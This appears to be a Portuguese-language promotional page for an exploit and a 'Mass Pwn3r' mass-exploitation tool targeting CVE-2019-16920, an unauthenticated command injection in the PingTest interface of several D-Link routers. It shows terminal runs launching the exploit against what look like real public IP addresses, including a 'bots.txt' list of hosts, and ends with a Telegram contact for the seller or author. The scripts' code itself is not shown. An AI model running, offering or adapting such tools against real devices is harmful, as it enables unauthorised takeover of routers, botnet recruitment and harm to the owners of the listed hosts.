
Exploit e Mass Pwn3r para CVE-2019-16920
A vulnerabilidade foi encontrada na firmware mais recente dos seguintes produtos D-Link: DIR-655 DIR-866L DIR-652 DHP-1565
A execução remota de código não autenticada ocorre em produtos D-Link como DIR-655C, DIR-866L, DIR-652 e DHP-1565. O problema ocorre quando o atacante envia uma entrada arbitrária para uma interface comum de gateway de dispositivo "PingTest", o que pode levar a uma injeção comum. Um atacante que acione com sucesso a injeção de comandos pode obter comprometimento total do sistema. Posteriormente, foi descoberto de forma independente que estes também são afetados: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 e DIR-825.
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting: 195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting: 83.243.166.37
[*]Exploiting: 74.95.133.33
[*]Exploiting: 97.89.64.118
[*]Exploiting: 66.162.68.154
[!]Unable to connect to host
[*]Exploiting: 72.47.152.161
[*]Exploiting: 97.93.250.209
[*]Exploiting: 183.207.196.64
root@kali:~#
Telegram:@eth_hacker0x18